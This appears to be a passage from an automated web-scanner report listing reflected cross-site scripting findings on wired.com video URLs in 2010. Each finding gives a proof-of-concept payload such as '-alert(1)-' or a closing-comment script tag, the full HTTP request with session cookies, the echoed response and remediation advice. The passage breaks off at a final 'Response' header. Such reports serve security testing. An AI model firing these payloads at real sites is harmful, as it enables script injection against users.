<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddf32"><a>9773438e8ff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latestddf32"><a>9773438e8ff/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:40 GMT Date: Mon, 22 Nov 2010 00:37:40 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106711
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latestddf32"><a>9773438e8ff"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88a4e"-alert(1)-"b2ff811f214 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest88a4e"-alert(1)-"b2ff811f214/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=285 Expires: Mon, 22 Nov 2010 00:43:36 GMT Date: Mon, 22 Nov 2010 00:38:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106786
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a57f0"-alert(1)-"a7d134a715c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633a57f0"-alert(1)-"a7d134a715c/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:44:19 GMT Date: Mon, 22 Nov 2010 00:39:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106758
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87ba6"-alert(1)-"0495acaed40 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box87ba6"-alert(1)-"0495acaed40/673489628001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=280 Expires: Mon, 22 Nov 2010 00:44:07 GMT Date: Mon, 22 Nov 2010 00:39:27 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106788
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64146"-alert(1)-"48511d6ee84 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/67348962800164146"-alert(1)-"48511d6ee84 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:44:34 GMT Date: Mon, 22 Nov 2010 00:39:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106697
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 24bfa--><script>alert(1)</script>3c46c277be6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video24bfa--><script>alert(1)</script>3c46c277be6/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29473 Vary: Accept-Encoding Cache-Control: max-age=286 Expires: Mon, 22 Nov 2010 00:45:15 GMT Date: Mon, 22 Nov 2010 00:40:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video24bfa--><script>alert(1)</script>3c46c277be6/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84273"><a>254c69cc0f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video84273"><a>254c69cc0f7/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29434 Vary: Accept-Encoding Cache-Control: max-age=274 Expires: Mon, 22 Nov 2010 00:44:33 GMT Date: Mon, 22 Nov 2010 00:39:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video84273"><a>254c69cc0f7 ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a13f"><a>8f3c503be2f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos2a13f"><a>8f3c503be2f/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=292 Expires: Mon, 22 Nov 2010 00:45:28 GMT Date: Mon, 22 Nov 2010 00:40:36 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106773
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos2a13f"><a>8f3c503be2f c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10a5c"-alert(1)-"9fe310adf50 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos10a5c"-alert(1)-"9fe310adf50/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=289 Expires: Mon, 22 Nov 2010 00:46:28 GMT Date: Mon, 22 Nov 2010 00:41:39 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106787
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccc48"-alert(1)-"092d67e8836 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latestccc48"-alert(1)-"092d67e8836/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:26 GMT Date: Mon, 22 Nov 2010 00:42:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106794
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea8c2"><a>b85cd2ddc5a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latestea8c2"><a>b85cd2ddc5a/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:46:41 GMT Date: Mon, 22 Nov 2010 00:41:41 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106755
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latestea8c2"><a>b85cd2ddc5a"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d93e"-alert(1)-"00159d9461f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/18158166335d93e"-alert(1)-"00159d9461f/glab-microsoft-kinect-fall-test-skyfire/660653903001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:38 GMT Date: Mon, 22 Nov 2010 00:42:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106759
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71d37"-alert(1)-"1aa3eddf2a9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire71d37"-alert(1)-"1aa3eddf2a9/660653903001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=278 Expires: Mon, 22 Nov 2010 00:47:34 GMT Date: Mon, 22 Nov 2010 00:42:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106695
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14c41"-alert(1)-"bd7540ba6f8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/66065390300114c41"-alert(1)-"bd7540ba6f8 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=298 Expires: Mon, 22 Nov 2010 00:48:10 GMT Date: Mon, 22 Nov 2010 00:43:12 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106695
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 80bd5--><script>alert(1)</script>b8bc6f2fc49 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video80bd5--><script>alert(1)</script>b8bc6f2fc49/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/680254055001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29466 Vary: Accept-Encoding Cache-Control: max-age=282 Expires: Mon, 22 Nov 2010 00:40:07 GMT Date: Mon, 22 Nov 2010 00:35:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video80bd5--><script>alert(1)</script>b8bc6f2fc49/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/680254055001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2dc5"><a>8169029ab92 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videoc2dc5"><a>8169029ab92/latest-videos/latest/1815816633/green-lantern-theatrical-trailer/680254055001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29427 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:39:28 GMT Date: Mon, 22 Nov 2010 00:34:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videoc2dc5"><a>8169029ab92 ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee349"><a>f57f2580c56 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videosee349"><a>f57f2580c56/latest/1815816633/green-lantern-theatrical-trailer/680254055001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
